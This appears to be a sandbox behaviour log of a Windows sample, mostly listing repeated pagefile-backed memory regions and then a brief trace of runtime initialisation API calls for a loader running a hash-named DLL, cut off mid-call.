name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18388 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18389 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18390 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18391 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18392 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18393 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18394 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18395 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18396 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18397 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18398 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18399 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18400 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18401 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18402 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18403 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18404 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18405 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18450 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18451 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18452 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18453 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18454 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18455 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18456 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18457 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18458 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18459 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18460 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18462 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18463 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18464 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18465 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18466 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18467 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18468 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18469 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18470 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18471 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18472 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18473 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18474 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18475 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18476 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18518 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18519 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18520 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18521 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18522 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18523 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18524 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18525 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18526 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18527 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18528 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18529 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18530 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18531 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18532 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18533 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18534 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18535 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18536 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18537 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18538 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18539 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18540 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18541 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18542 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18543 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18544 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18545 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18546 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18547 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18548 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18549 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18550 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18551 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18552 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18553 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18554 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18555 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18556 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18557 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18558 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18559 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18560 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18561 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18562 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18563 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18639 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18640 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18641 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18642 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18643 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18644 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18645 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18646 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18647 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18648 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18649 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18650 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18651 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18652 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18653 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18654 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18655 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18656 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18657 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18658 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18659 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18660 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18661 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18662 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18663 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18664 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18665 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18666 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18667 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18668 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18669 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18670 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 18671 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 202 os_tid = 0x10ec [0201.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.915] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0201.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.915] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0201.916] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0201.916] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.916] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0201.917] GetProcessHeap () returned 0x480000 [0201.917] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.917] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0201.917] GetLastError () returned 0x7e [0201.917] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0201.917] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0201.918] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c8) returned 0x48bec0 [0201.918] SetLastError (dwErrCode=0x7e) [0201.918] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1200) returned 0x493b10 [0201.920] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0201.920] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0201.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0201.920] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0201.920] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress" [0201.920] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress" [0201.920] GetACP () returned 0x4e4 [0201.920] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x228) returned 0x484f20 [0201.920] IsValidCodePage (CodePage=0x4e4) returned 1 [0201.920] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0201.920] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0201.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0201.920] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0201.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0201.921] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", 